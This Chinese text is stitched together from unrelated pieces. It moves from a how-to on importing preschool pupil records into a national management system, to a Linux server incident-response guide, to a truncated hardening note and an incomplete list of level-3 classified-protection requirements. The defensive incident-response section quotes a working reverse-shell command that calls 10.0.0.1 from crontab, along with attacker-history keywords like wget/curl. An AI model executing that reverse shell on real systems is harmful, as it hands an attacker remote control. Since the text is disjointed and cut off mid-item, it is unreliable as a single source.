這里簡單把過程說一下(例如：福建地區(qū)的)

　　1、登錄全國學前教育管理信息系統(tǒng)

　　2、新建好班級信息，因為在下面的做學生數(shù)據(jù)時要用到班級名稱對應的班級編碼，如下圖：

　　記下各班級對應的班級編碼，下面有用。

　　3、制作學生數(shù)據(jù)

　　1）下載最新的模板excel表格，如下圖

　　2）如果您之前已經(jīng)下載了模板excel表格，請與新下載的對比，看要求填寫的數(shù)據(jù)項是否有增加或減少，如果有則以新下載的excel表格為準，然后按照要求添加學生信息。注意,其中一項學生信息--班級編號即為上面提到的：班級名稱對應的班級編碼.

　　3)導入制作好的excel表格，如上圖，選擇文件，點導入，這時系統(tǒng)會對導入的excel表格進行數(shù)據(jù)校驗，如完全正確，顯示導入成功。如校驗不成功，則彈出下載導入數(shù)據(jù)校驗日志，打開日志，根據(jù)日志的提示，再對excel表格里數(shù)據(jù)進行修改，直到提示導入成功。如下圖：不成功

　　4、數(shù)據(jù)成功導入后，在班級現(xiàn)有幼兒數(shù)中顯示幼兒數(shù)，如下圖已經(jīng)導入了35條幼兒信息

　　5、提交幼兒信息：點幼兒管理--新建幼兒學籍--選中幼兒信息點提交。提交完成后所有的幼兒信息

　　6、審核幼兒信息：用審核賬號登錄，找到幼兒學籍管理--幼兒學籍審核，將幼兒信息一條一條的審核。

　　7、沒有審核通過的幼兒信息，將會在被駁回的幼兒這一欄里出現(xiàn)，然后根據(jù)審核意見修改、保存、提交、審核。

　　8、注意：a、如果發(fā)現(xiàn)重復導入幼兒信息、未設(shè)置班級信息就導入或者導入信息有誤，再未“提交”前可先將幼兒信息全部刪除，再在電子表格里修改，確保正確了再導入，提交；b、有重復導入的幼兒信息必須重做，否則驗證不會通過。具體步驟如下：進入幼兒園的審核用戶——選中重復或錯誤的信息——點擊審核——審核意見一定要填（可以填不好）——點擊駁回——進入幼兒園的普通用戶重新修改（修改完后再進入審核用戶重新審核，通過后點擊“提交”。注意：導入完成后要記得點擊“提交”。

（本文內(nèi)容由百度知道網(wǎng)友群麗乘風sama貢獻）

遇到服務器被黑，很多人會采用拔網(wǎng)線、封 iptables或者關(guān)掉所有服務的方式應急，但如果是線上服務器就不能立即采用任何影響業(yè)務的手段了，需要根據(jù)服務器業(yè)務情況分類處理。

下面我們看一個標準的服務器安全應急影響應該怎么做，也算是筆者從事安全事件應急近 6年以來的一些經(jīng)驗之談，借此拋磚引玉，希望大神們不吝賜教。

圖 1：處理思路

如上圖，將服務器安全應急響應流程分為如下 8個環(huán)節(jié)：

發(fā)現(xiàn)安全事件（核實）現(xiàn)場保護服務器保護影響范圍評估在線分析數(shù)據(jù)備份深入分析事件報告整理接下來我們將每個環(huán)節(jié)分解，看看需要如何斷開異常連接、排查入侵源頭、避免二次入侵等。

核實信息（運維/安全人員）

根據(jù)安全事件通知源的不同，分為兩種：

外界通知：和報告人核實信息，確認服務器/系統(tǒng)是否被入侵?，F(xiàn)在很多企業(yè)有自己的 SRC（安全響應中心），在此之前更多的是依賴某云。這種情況入侵的核實一般是安全工程師完成。

自行發(fā)現(xiàn)：根據(jù)服務器的異常或故障判斷，比如對外發(fā)送大規(guī)模流量或者系統(tǒng)負載異常高等，這種情況一般是運維工程師發(fā)現(xiàn)并核實的。

現(xiàn)場保護（運維）

我們很多人看過大陸的電視劇《重案六組》，每次接到刑事案件，刑警們第一時間就是封鎖現(xiàn)場、保存現(xiàn)場原狀。

同樣道理，安全事件發(fā)生現(xiàn)場，跟刑事案件發(fā)生現(xiàn)場一樣，需要保存第一現(xiàn)場重要信息，方便后面入侵檢測和取證。

保存現(xiàn)場環(huán)境（截圖）

相關(guān)信息采集命令如下：

進程信息：ps axu

網(wǎng)絡(luò)信息：netstat –a

網(wǎng)絡(luò)+進程：lsof / netstat -p

攻擊者登陸情況（截圖）

相關(guān)信息采集命令如下：

查看當前登錄用戶：w或 who -a

服務器保護（運維/機房）

這里的現(xiàn)場保護和服務器保護是兩個不同的環(huán)節(jié)，前者注重取證，后者注重環(huán)境隔離。

核實機器被入侵后，應當盡快將機器保護起來，避免被二次入侵或者當成跳板擴大攻擊面。

此時，為保護服務器和業(yè)務，避免服務器被攻擊者繼續(xù)利用，應盡快遷移業(yè)務，立即下線機器。

如果不能立即處理，應當通過配置網(wǎng)絡(luò) ACL等方式，封掉該服務器對網(wǎng)絡(luò)的雙向連接。

影響范圍評估（運維/開發(fā)）

一般是運維或者程序確認影響范圍，需要運維通過日志或者監(jiān)控圖表確認數(shù)據(jù)庫或者敏感文件是否泄露，如果是代碼或者數(shù)據(jù)庫泄露了，則需要程序評估危害情況與處置方法。

影響訪問評估一般從下面幾點來入手：

具體業(yè)務架構(gòu)：Web(PHP/Java， WebServer)， Proxy， DB等。

IP及所處區(qū)域拓撲等：VLAN內(nèi)服務器和應用情況。

確定同一網(wǎng)絡(luò)下面服務器之間的訪問：可以互相登陸，是否需要 Key或者是密碼登錄。

由此確定檢查影響范圍，確認所有受到影響的網(wǎng)段和機器。

在線分析（安全人員/運維）

這時需要根據(jù)個人經(jīng)驗快速在線分析，一般是安全人員和運維同時在線處理，不過會涉及多人協(xié)作的問題，需要避免多人操作機器時破壞服務器現(xiàn)場，造成分析困擾。

之前筆者遇到一個類似的問題，就是運維排查時敲錯了 iptables的命令，將 iptables -L敲成 iptables -i導致 iptables-save時出現(xiàn)異常記錄，結(jié)果安全人員上來檢查時就被這條記錄迷惑了，導致處理思路受到一定干擾。

所有用戶 History日志檢測

關(guān)鍵字：wget/curl， gcc，或者隱藏文件，敏感文件后綴（.c，.py，conf， .pl， .sh)。

檢查是否存在異常用戶。

檢查最近添加的用戶，是否有不知名用戶或不規(guī)范提權(quán)。

找出 root權(quán)限的用戶。

可以執(zhí)行以下命令檢查：

grep -v -E "^#" /etc/passwd | awk -F： '$3 == 0 { print $1}'

反連木馬判斷

netstat –a

注意非正常端口的外網(wǎng) IP

可疑進程判斷

判斷是否為木馬 ps –aux

重點關(guān)注文件（隱藏文件）， Python腳本，Perl腳本，Shell腳本（bash/sh/zsh）。

使用 which，whereis，find定位。

Crontab檢測

不要用 crontab –l查看 crontab（繞過檢測），也有通過寫 crontab配置文件反彈Shell的，筆者接觸過幾次，一般都是使用的 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1。

系統(tǒng)日志檢測

檢查 sshd服務配置文件 /etc/ssh/sshd_config和系統(tǒng)認證日志 auth、message，判斷是否為口令破解攻擊。

/etc/ssh/sshd_config文件確認認證方式。

確認日志是否被刪除或者清理過的可能（大小判斷）。

last/lastb可以作為輔助，不過可能不準確。

NHIDS正常運行判斷

是否安裝：ls /etc/ossec

是否運行正常：ps axu |grep nhids，三個 nhids進程則表示正常

其他攻擊分析

抓取網(wǎng)絡(luò)數(shù)據(jù)包并進行分析，判斷是否為拒絕服務攻擊，這里需要注意，一定要使用 -w參數(shù)，這樣才能保存成 pcap格式導入到 wireshark，這樣分析起來會事半功倍。

tcpdump -w tcpdump.log

安全相關(guān)的關(guān)鍵文件和數(shù)據(jù)備份（運維）

可以同步進行，使用 sftp/rsync等將日志上傳到安全的服務器：

打包系統(tǒng)日志：參考：$ tar -jcvf syslog.tar.bz2 /var/log

打包 Web日志：access log

打包 History日志（所有用戶），參考：$ cp /home/user/，history user_history

打包 crontab記錄

打包密碼文件：/etc/passwd， /etc/shadow

打包可疑文件、后門、Shell信息

深入分析（安全人員）

初步鎖定異常進程和惡意代碼后，將受影響范圍梳理清楚，封禁了入侵者對機器的控制后，接下來需要深入排查入侵原因。一般可以從 Webshell、開放端口服務等方向順藤摸瓜。

Webshell入侵

使用 Webshell_check.py腳本檢測 Web目錄：

$ python webshell_check.py /var/www/ >result.txt

查找 Web目錄下所有 nobody的文件，人工分析：

$ find /var/www –user nobody >nobody.txt

如果能確定入侵時間，可以使用 find查找最近時間段內(nèi)變化的文件：

$ find / -type f -name "\.?*" |xargs ls -l |grep "Mar 22"

$ find / -ctime/-mtime 8

利用 Web漏洞直接反連 Shell

分析 access.log：

縮小日志范圍：時間，異常 IP提取。

攻擊行為提?。撼Ｒ姷墓?exp識別。

系統(tǒng)弱口令入侵

認證相關(guān)日志 auth/syslog/message排查：

爆破行為定位和 IP提取。

爆破是否成功確定：有爆破行為 IP是否有 accept記錄。

如果日志已經(jīng)被清理，使用工具（比如John the Ripper）爆破 /etc/passwd，/etc/shadow。

其他入侵

其他服務器跳板到本機。

后續(xù)行為分析

History日志：提權(quán)、增加后門，以及是否被清理。

Sniffer：網(wǎng)卡混雜模式檢測 ifconfig |grep –i proc。

內(nèi)網(wǎng)掃描：網(wǎng)絡(luò) nmap/掃描器，socks5代理。

確定是否有 rootkit：rkhunter， chkrootkit， ps/netstat替換確認。

后門清理排查

根據(jù)時間點做關(guān)聯(lián)分析：查找那個時間段的所有文件。

一些小技巧：/tmp目錄， ls –la，查看所有文件，注意隱藏的文件。

根據(jù)用戶做時間關(guān)聯(lián)：比如 nobody。

其他機器的關(guān)聯(lián)操作

其他機器和這臺機器的網(wǎng)絡(luò)連接 （日志查看）、相同業(yè)務情況（同樣業(yè)務，負載均衡）。

整理事件報告（安全人員）

事件報告應包含但不限于以下幾個點：

分析事件發(fā)生原因：事件為什么會發(fā)生的原因。

分析整個攻擊流程：時間點、操作。

分析事件處理過程：整個事件處理過程總結(jié)是否有不足。

分析事件預防：如何避免事情再次發(fā)生。

總結(jié)：總結(jié)事件原因，改進處理過程，預防類似事件再次發(fā)生。

處理中遇到的比較棘手的事情

1、日志和操作記錄全被刪了，怎么辦？

strace查看 losf進程，再嘗試恢復一下日志記錄，不行的話鏡像硬盤數(shù)據(jù)慢慢查。這個要用到一些取證工具了，dd 硬盤數(shù)據(jù)再去還原出來。

2、系統(tǒng)賬號密碼都修改了，登不進去？

重啟進單用戶模式修改 root密碼，或者通過控制卡操作，或者直接還原系統(tǒng)，都搞不定就直接重裝吧。

3、使用常見的入侵檢測命令未發(fā)現(xiàn)異常進程，但是機器在對外發(fā)包，這是怎么回事？

這種情況下很可能常用的系統(tǒng)命令已經(jīng)被攻擊者或者木馬程序替換，可以通過 md5sum對比本機二進制文件與正常機器的 md5值是否一致。

如果發(fā)現(xiàn)不一致，肯定是被替換了，可以從其他機器上拷貝命令到本機替換，或者 alias為其他名稱，避免為惡意程序再次替換。

4、被 getshell怎么辦？

漏洞修復前，系統(tǒng)立即下線，用內(nèi)網(wǎng)環(huán)境訪問。

上傳點放到內(nèi)網(wǎng)訪問，不允許外網(wǎng)有類似的上傳點，有上傳點，而且沒有校驗文件類型很容易上傳 Webshell。

被 getshell的服務器中是否有敏感文件和數(shù)據(jù)庫，如果有請檢查是否有泄漏。

hosts文件中對應的 host關(guān)系需要重新配置，攻擊者可以配置 hosts來訪問測試環(huán)境。

重裝系統(tǒng)。

案例分析

上面講了很多思路的東西，相信大家更想看看實際案例，下面介紹兩個案例。

案例 1

一個別人處理的案例，基本處理過程如下：

通過外部端口掃描收集開放端口信息，然后獲取到反彈 Shell信息，登陸機器發(fā)現(xiàn)關(guān)鍵命令已經(jīng)被替換，后面查看 History記錄，發(fā)現(xiàn)疑似木馬文件，通過簡單逆向和進程查看發(fā)現(xiàn)了異常進程，從而鎖定了入侵原因。

案例 2

一個筆者實際處理過的案例，基本處理流程跟上面提到的思路大同小異。

整個事情處理經(jīng)過大致如下：

1、運維發(fā)現(xiàn)一臺私有云主機間歇性的對外發(fā)送高達 800Mbps的流量，影響了同一個網(wǎng)段的其他機器。

2、安全人員接到通知后，先確認了機器屬于備機，沒有跑在線業(yè)務，于是通知運維封禁 iptables限制外網(wǎng)訪問。

3、運維為安全人員臨時開通機器權(quán)限，安全人員通過 History和 ps找到的入侵記錄和異常進程鎖定了對外大量發(fā)包的應用程序，清理了惡意進程并刪除惡意程序。

惡意進程如下，經(jīng)過在網(wǎng)絡(luò)搜索發(fā)現(xiàn)是一種 DDOS木馬，但沒有明確的處理思路：

/usr/bin/bsd-port/getty/usr/bin/acpid./dbuspm-session /sbin/DDosClient RunByP4407/sbin/DDosClient RunByPM4673

處理過程中，安全人員懷疑系統(tǒng)文件被替換，通過對比該機器與正常機器上面的 ps、netstat等程序的大小發(fā)現(xiàn)敏感程序已經(jīng)被替換，而且 mtime也被修改。

正常機器：

du -sh /bin/ps

92K /bin/ps

du -sh /bin/netstat

120K /bin/netstat

被入侵機器：

du -sh /bin/netstat

2.0M /bin/netstat

du -sh /bin/ps

2.0M /bin/ps

將部分常用二進制文件修復后，發(fā)現(xiàn)異常進程被 kill掉后仍重啟了，于是安裝殺毒軟件 clamav和 rootkit hunter進行全盤掃描。

從而確認了被感染的所有文件，將那些可以刪除的文件刪除后再次 kill掉異常進程，則再沒有重啟的問題。

4、影響范圍評估

由于該機器只是備機，上面沒有敏感數(shù)據(jù)，于是信息泄露問題也就不存在了。

掃描同一網(wǎng)段機器端口開放情況、排查被入侵機器 History是否有對外掃描或者入侵行為，為此還在該網(wǎng)段機器另外部署蜜罐進行監(jiān)控。

5、深入分析入侵原因

通過被入侵機器所跑服務、iptables狀態(tài)，確認是所跑服務支持遠程命令執(zhí)行。

并且機器 iptables為空導致黑客通過往 /etc/crontab中寫“bash -i >& /dev/tcp/10.0.0.1/8080 0>&1”命令方式進行 Shell反彈，從而入侵了機器。

6、驗證修復、機器下線重裝

進行以上修復操作后，監(jiān)控未發(fā)現(xiàn)再有異常，于是將機器下線重裝。

7、完成安全事件處理報告

每次安全事件處理后，都應當整理成報告，不管是知識庫的構(gòu)建，還是統(tǒng)計分析安全態(tài)勢，都是很有必要的。

這次主要介紹了服務器被入侵時推薦的一套處理思路。實際上，安全防護跟運維思路一樣，都是要防患于未然，這時候的審計或者響應很難避免危害的發(fā)生了。

我們更希望通過安全意識教育、安全制度的建設(shè)，在問題顯露端倪時即可消弭于無形。

Linux服務器安全防護要點

1、強化：密碼管理

設(shè)定登錄密碼是一項非常重要的安全措施，如果用戶的密碼設(shè)定不合適，就很容易被破譯，尤其是擁有超級用戶使用權(quán)限的用戶，如果沒有良好的密碼，將給系統(tǒng)造成很大的安全漏洞。

目前密碼破解程序大多采用字典攻擊以及暴力攻擊手段，而其中用戶密碼設(shè)定不當，則極易受到字典攻擊的威脅。很多用戶喜歡用自己的英文名、生日或者賬戶等信息來設(shè)定密碼，這樣，黑客可能通過字典攻擊或者是社會工程的手段來破解密碼。所以建議用戶在設(shè)定密碼的過程中，應盡量使用非字典中出現(xiàn)的組合字符，并且采用數(shù)字與字符相結(jié)合、大小寫相結(jié)合的密碼設(shè)置方式，增加密碼被黑客破解的難度。而且，也可以使用定期修改密碼、使密碼定期作廢的方式，來保護自己的登錄密碼。

在多用戶系統(tǒng)中，如果強迫每個用戶選擇不易猜出的密碼，將大大提高系統(tǒng)的安全性。但如果passwd程序無法強迫每個上機用戶使用恰當?shù)拿艽a，要確保密碼的安全度，就只能依靠密碼破解程序了。實際上，密碼破解程序是黑客工具箱中的一種工具，它將常用的密碼或者是英文字典中所有可能用來作密碼的字都用程序加密成密碼字，然后將其與Linux系統(tǒng)的/etc/passwd密碼文件或/etc/shadow影子文件相比較，如果發(fā)現(xiàn)有吻合的密碼，就可以求得明碼了。在網(wǎng)絡(luò)上可?...

在進行系統(tǒng)總體技術(shù)方案設(shè)計時，我們常需要根據(jù)招標書中的安全機制要求，設(shè)計對應的安全機制。如要求投標人必須按照信息系統(tǒng)安全等級保護三級的要求，提出系統(tǒng)安全設(shè)計方案，招標方將另行采購。

我們在進行安全設(shè)計時主要要參考GB/T 24856-2009 《信息安全技術(shù)信息系統(tǒng)等級保護安全設(shè)計技術(shù)要求》，本方案中，我們特別對于信息系統(tǒng)等級保護安全設(shè)計三級的關(guān)鍵內(nèi)容：強制訪問控制提出了技術(shù)實現(xiàn)方案。本文檔將對信息系統(tǒng)安全等級實現(xiàn)要求進行描述。同時并以GB/T 22239-2008 《信息安全技術(shù)信息系統(tǒng)安全等級保護基本要求》的基本要求為主要線索，落實了信息系統(tǒng)安全等級保護基本要求的各項要求。

信息系統(tǒng)安全等級保護三級實現(xiàn)要求

信息安全等級保護是我國信息安全的基本制度、基本政策、基本方法。已出臺的一系列信息安全等級保護相關(guān)法規(guī)、政策文件、國家標準和公共安全行業(yè)標準，為信息安全等級保護工作的開展提供了法律、政策、標準依據(jù)。2007年7月重要信息安全等級保護定級工作會議，標志著信息安全等級保護工作在我國全面展開。目前全國重要信息系統(tǒng)定級工作已基本完成，為了配合信息系統(tǒng)安全建設(shè)和加固工作，特制訂該標準。本標準適用于指導信息系統(tǒng)運營使用單位、信息安全企業(yè)、信息安全服務機構(gòu)開展信息系統(tǒng)等級保護安全技術(shù)方案的設(shè)計和實施，可作為信息安全職能部門進行監(jiān)督、檢查和指導的依據(jù)。同時也適用于信息系統(tǒng)安全建設(shè)的相關(guān)人員，以及從事信息系統(tǒng)安全測試、管理和服務的相關(guān)人員。第三級信息系統(tǒng)安全保護環(huán)境的安全設(shè)計是對GB 17859-1999安全標記保護級安全保護要求的具體實現(xiàn)。是在第二級信息系統(tǒng)安全保護環(huán)境所提供的安全機制的基礎(chǔ)上，通過構(gòu)建非形式化的安全策略模型，增加標記和強制訪問控制等安全機制，使系統(tǒng)在安全管理中心統(tǒng)一的安全策略管控下，提供對重要信息系統(tǒng)的安全運行和數(shù)據(jù)進行安全保護的能力，使整個信息系統(tǒng)的安全保護能力能夠抵御各種常見攻擊的水平。第三級信息系統(tǒng)的安全計算環(huán)境，要求對安全保護環(huán)境進行較高程度的安全保護，在第二級安全設(shè)計的基礎(chǔ)上，主要是通過在安全計算環(huán)境和安全區(qū)域邊界實施強制訪問控制，使安全計算環(huán)境的抗攻擊能力達到較大提高，同時要求在用戶身份鑒別和用戶數(shù)據(jù)的完整性保護和保密性等方面，均應達到與強制訪問控制項匹配的水平。比如，采用較完整的密碼體系，實現(xiàn)用戶身份鑒別、簽名、驗證、抗抵賴，實現(xiàn)用戶身份數(shù)據(jù)的保密性、完整性保護，以及程序可信執(zhí)行保護等，并通過較完整的安全管理中心實現(xiàn)對整個信息系統(tǒng)安全保護環(huán)境安全策略的統(tǒng)一管理。第三級信息系統(tǒng)的安全區(qū)域邊界，對來自外部的對安全計算環(huán)境的攻擊進行較高程度的安全防護。具體是，在第二級安全區(qū)域邊界安全設(shè)計的基礎(chǔ)上，通過選擇和配置具有符合第三級安全要求的區(qū)域邊界協(xié)議過濾、區(qū)域邊界完整性保護和區(qū)域邊界安全審計等安全機制和/或產(chǎn)品，特別是增加區(qū)域邊界訪問控制，來進行區(qū)域邊界訪問控制，來進行區(qū)域邊界安全防護，以對抗來自外部的攻擊。第三級信息系統(tǒng)的安全通信網(wǎng)絡(luò)，對通信網(wǎng)絡(luò)的安全運行和通信網(wǎng)絡(luò)所傳輸?shù)臄?shù)據(jù)進行較高程度的安全保護。具體是，在第二級安全通信網(wǎng)絡(luò)安全設(shè)計的基礎(chǔ)上，通過選擇和配置具有符合第三級安全要求的通信網(wǎng)絡(luò)安全審計、通信網(wǎng)絡(luò)數(shù)據(jù)傳輸完整性、保密性保護以及網(wǎng)絡(luò)可信接入的安全機制和/或產(chǎn)品，實現(xiàn)通信網(wǎng)絡(luò)的安全保護。第三級信息系統(tǒng)的安全管理中心的設(shè)計，是在第二級信息系統(tǒng)安全管理中心設(shè)計的基礎(chǔ)上，通過增強對安全審計的管理和增加安全管理的相關(guān)內(nèi)容，實現(xiàn)信息系統(tǒng)各安全管理統(tǒng)一管理。第三級信息系統(tǒng)各安全機制的統(tǒng)一管理主要包括：對系統(tǒng)中由安全策略控制的主體、客體進行統(tǒng)一標記，對主體進行統(tǒng)一授權(quán)管理，并為全系統(tǒng)配置統(tǒng)一的安全策略；對分布在系統(tǒng)中的各種需要集中控制和管理的安全機制進行管理和控制；實現(xiàn)系統(tǒng)管理員、安全員和審計員的三權(quán)分離，并形成相互制約關(guān)系；為安全員和審計員各自提供專用的操作界面，并對安全員和審計員按照第三級安全的要求進行嚴格的身份鑒別，對其操作行為進行審計。

其內(nèi)容大致如圖：

1.1. 技術(shù)要求

1.1.1.物理安全

1.1.1.1. 物理位置的選擇（G3）

本項要求包括：

a) 機房和辦公場地應選擇在具有防震、防風和防雨等能力的建筑內(nèi)；

b) 機房場地應避免設(shè)在建筑物的高層或地下室，以及用水設(shè)備的下層或隔壁。

1.1.1.2 物理訪問控制（G3）

本項要求包括：

a) 機房出入口應安排專人值守，控制、鑒別和記錄進入的人員；

b) 需進入機房的來訪人員應經(jīng)過申請和審批流程，并限制和監(jiān)控其活動范圍；

c) 應對機房劃分區(qū)域進行管理，區(qū)域和區(qū)域之間設(shè)置物理隔離裝置，在重要區(qū)域前設(shè)置交付或安裝等過渡區(qū)域；

d) 重要區(qū)域應。

1.1.1.3 防盜竊和防破壞（G3）

本項要求包括：

a) 應將主要設(shè)備放置在機房內(nèi)；

b) 應將設(shè)備或主要部件進行固定，并設(shè)置明顯的不易除去的標記；

c) 應將通信線纜鋪設(shè)在隱蔽處，可鋪設(shè)在地下或管道中；

d) 應對介質(zhì)分類標識，存儲在介質(zhì)庫或檔案室中；

e) 應利用光、電等技術(shù)設(shè)置機房防盜報警系統(tǒng)；

f) 應對機房設(shè)置監(jiān)控報警系統(tǒng)。

1.1.1.4 防雷擊（G3）

本項要求包括：

a) 機房建筑應設(shè)置避雷裝置；

b) 應設(shè)置防雷保安器，防止感應雷；

c) 機房應設(shè)置交流電源地線。

1.1.1.5 防火（G3）

本項要求包括：

a) 機房應設(shè)置火災自動消防系統(tǒng)，能夠自動檢測火情、自動報警，并自動滅火；

b) 機房及相關(guān)的工作房間和輔助房應采用具有耐火等級的建筑材料；

c) 機房應采取區(qū)域隔離防火措施，將重要設(shè)備與其他設(shè)備隔離開。

1.1.1.6 防水和防潮（G3）

本項要求包括：

a) 水管安裝，不得穿過機房屋頂和活動地板下；

b) 應采取措施防止雨水通過機房窗戶、屋頂和墻壁滲透；

c) 應采取措施防止機房內(nèi)水蒸氣結(jié)露和地下積水的轉(zhuǎn)移與滲透；

d) 應安裝對水敏感的檢測儀表或元件，對機房進行防水檢測和報警。

1.1.1.7 防靜電（G3）

本項要求包括：

a) 主要設(shè)備應采用必要的接地防靜電措施；

b) 機房應采用防靜電地板。

1.1.1.8 溫濕度控制（G3）

機房應設(shè)置溫、濕度自動調(diào)節(jié)設(shè)施，使機房溫、濕度的變化在設(shè)備運行所允許的范圍之內(nèi)。

1.1.1.9電力供應（A3）

本項要求包括：

a) 應在機房供電線路上配置穩(wěn)壓器和過電壓防護設(shè)備；

b) 應提供短期的備用電力供應，至少滿足主要設(shè)備在斷電情況下的正常運行要求；

c) 應設(shè)置冗余或并行的電力電纜線路為計算機系統(tǒng)供電；

d) 應建立備用供電系統(tǒng)。

1.1.1.10 電磁防護（S3）

本項要求包括：

a) 應采用接地方式防止外界電磁干擾和設(shè)備寄生耦合干擾；

b) 電源線和通信線纜應隔離鋪設(shè)，避免互相干擾；

c) 應對關(guān)鍵設(shè)備和磁介質(zhì)實施電磁屏蔽。

1.1.2 網(wǎng)絡(luò)安全

1.1.2.1 結(jié)構(gòu)安全（G3）

本項要求包括：

a) 應保證主要網(wǎng)絡(luò)設(shè)備的業(yè)務處理能力具備冗余空間，滿足業(yè)務高峰期需要；

b) 應保證網(wǎng)絡(luò)各個部分的帶寬滿足業(yè)務高峰期需要；

c) 應在業(yè)務終端與業(yè)務服務器之間進行路由控制建立安全的訪問路徑；

d) 應繪制與當前運行情況相符的網(wǎng)絡(luò)拓撲結(jié)構(gòu)圖；

e) 應根據(jù)各部門的工作職能、重要性和所涉及信息的重要程度等因素，劃分不同的子網(wǎng)或網(wǎng)段，并按照方便管理和控制的原則為各子網(wǎng)、網(wǎng)段分配地址段；

f) 應避免將重要網(wǎng)段部署在網(wǎng)絡(luò)邊界處且直接連接外部信息系統(tǒng)，重要網(wǎng)段與其他網(wǎng)段之間采取可靠的技術(shù)隔離手段；

g) 應按照對業(yè)務服務的重要次序來指定帶寬分配優(yōu)先級別，保證在網(wǎng)絡(luò)發(fā)生擁堵的時候優(yōu)先保護重要主機。

1.1.2.2 訪問控制（G3）

本項要求包括：

a) 應在網(wǎng)絡(luò)邊界部署訪問控制設(shè)備，啟用訪問控制功能；

b) 應能根據(jù)會話狀態(tài)信息為數(shù)據(jù)流提供明確的允許/拒絕訪問的能力，控制粒度為端口級；

c) 應對進出網(wǎng)絡(luò)的信息內(nèi)容進行過濾，實現(xiàn)對應用層HTTP、FTP、TELNET、SMTP、POP3等協(xié)議命令級的控制；

d) 應在會話處于非活躍一定時間或會話結(jié)束后終止網(wǎng)絡(luò)連接；

e) 應限制網(wǎng)絡(luò)最大流量數(shù)及網(wǎng)絡(luò)連接數(shù)；

f) 重要網(wǎng)段應采取技術(shù)手段防止地址欺騙；

g) 應按用戶和系統(tǒng)之間的允許訪問規(guī)則，決定允許或拒絕用戶對受控系統(tǒng)進行資源訪問，控制粒度為單個用戶；

h) 應限制具有撥號訪問權(quán)限的用戶數(shù)量。

1.1.2.3 安全審計（G3）

本項要求包括：

a) 應對網(wǎng)絡(luò)系統(tǒng)中的網(wǎng)絡(luò)設(shè)備運行狀況、網(wǎng)絡(luò)流量、用戶行為等進行日志記錄；

b) 審計記錄應包括：事件的日期和時間、用戶、事件類型、事件是否成功及其他與審計相關(guān)的信息；

c) 應能夠根據(jù)記錄數(shù)據(jù)進行分析，并生成審計報表；

d) 應對審計記錄進行保護，避免受到未預期的刪除、修改或覆蓋等。

1.1.2.4 邊界完整性檢查（S3）

本項要求包括：

a) 應能夠?qū)Ψ鞘跈?quán)設(shè)備私自聯(lián)到內(nèi)部網(wǎng)絡(luò)的行為進行檢查，準確定出位置，并對其進行有效阻斷；

b) 應能夠?qū)?nèi)部網(wǎng)絡(luò)用戶私自聯(lián)到外部網(wǎng)絡(luò)的行為進行檢查，準確定出位置，并對其進行有效阻斷。

1.1.2.5 入侵防范（G3）

本項要求包括：

a) 應在網(wǎng)絡(luò)邊界處監(jiān)視以下攻擊行為：端口掃描、強力攻擊、木馬后門攻擊、拒絕服務攻擊、緩沖區(qū)溢出攻擊、IP碎片攻擊和網(wǎng)絡(luò)蠕蟲攻擊等；

b) 當檢測到攻擊行為時，記錄攻擊源IP、攻擊類型、攻擊目的、攻擊時間，在發(fā)生嚴重入侵事件時應提供報警。

1.1.2.6 惡意代碼防范（G3）

本項要求包括：

a) 應在網(wǎng)絡(luò)邊界處對惡意代碼進行檢測和清除；

b) 應維護惡意代碼庫的升級和檢測系統(tǒng)的更新。

1.1.2.7 網(wǎng)絡(luò)設(shè)備防護（G3）

本項要求包括：

a) 應對登錄網(wǎng)絡(luò)設(shè)備的用戶進行身份鑒別；

b) 應對網(wǎng)絡(luò)設(shè)備的管理員登錄地址進行限制；

c) 網(wǎng)絡(luò)設(shè)備用戶的標識應唯一；

d) 主要網(wǎng)絡(luò)設(shè)備應對同一用戶選擇兩種或兩種以上組合的鑒別技術(shù)來進行身份鑒別；

e) 身份鑒別信息應具有不易被冒用的特點，口令應有復雜度要求并定期更換；

f) 應具有登錄失敗處理功能，可采取結(jié)束會話、限制非法登錄次數(shù)和當網(wǎng)絡(luò)登錄連接超時自動退出等措施；

g) 當對網(wǎng)絡(luò)設(shè)備進行遠程管理時，應采取必要措施防止鑒別信息在網(wǎng)絡(luò)傳輸過程中被竊聽；

應實現(xiàn)設(shè)備特權(quán)用戶的權(quán)限分離。

主機安全則從軟件層面進行安全防護，這方面的措施非常多。也是需要應對較為頻繁的一環(huán)。

1.1.2.1 身份鑒別（S3）

本項要求包括：

a) 應對登錄操作系統(tǒng)和數(shù)據(jù)庫系統(tǒng)的用戶進行身份標識和鑒別；

b) 操作系統(tǒng)和數(shù)據(jù)庫系統(tǒng)管理用戶身份標識應具有不易被冒用的特點，口令應有復雜度要求并定期更換；

c) 應啟用登錄失敗處理功能，可采取結(jié)束會話、限制非法登錄次數(shù)和自動退出等措施；

d) 當對服務器進行遠程管理時，應采取必要措施，防止鑒別信息在網(wǎng)絡(luò)傳輸過程中被竊聽；

e) 應為操作系統(tǒng)和數(shù)據(jù)庫系統(tǒng)的不同用戶分配不同的用戶名，確保用戶名具有唯一性。

f) 應采用兩種或兩種以上組合的鑒別技術(shù)對管理用戶進行身份鑒別。

1.1.2.2 訪問控制（S3）

本項要求包括：

a) 應啟用訪問控制功能，依據(jù)安全策略控制用戶對資源的訪問；

b) 應根據(jù)管理用戶的角色分配權(quán)限，實現(xiàn)管理用戶的權(quán)限分離，僅授予管理用戶所需的最小權(quán)限；

c) 應實現(xiàn)操作系統(tǒng)和數(shù)據(jù)庫系統(tǒng)特權(quán)用戶的權(quán)限分離；

d) 應嚴格限制默認帳戶的訪問權(quán)限，重命名系統(tǒng)默認帳戶，修改這些帳戶的默認口令；

e) 應及時刪除多余的、過期的帳戶，避免共享帳戶的存在。

f) 應對重要信息資源設(shè)置敏感標記；

g) 應依據(jù)安全策略嚴格控制用戶對有敏感標記重要信息資源的操作；

1.1.2.3 安全審計（G3）

本項要求包括：

a) 審計范圍應覆蓋到服務器和重要客戶端上的每個操作系統(tǒng)用戶和數(shù)據(jù)庫用戶；

b) 審計內(nèi)容應包括重要用戶行為、系統(tǒng)資源的異常使用和重要系統(tǒng)命令的使用等系統(tǒng)內(nèi)重要的安全相關(guān)事件；

c) 審計記錄應包括事件的日期、時間、類型、主體標識、客體標識和結(jié)果等；

d) 應能夠根據(jù)記錄數(shù)據(jù)進行分析，并生成審計報表；

e) 應保護審計進程，避免受到未預期的中斷；

f) 應保護審計記錄，避免受到未預期的刪除、修改或覆蓋等。

1.1.2.4 剩余信息保護（S3）

本項要求包括：

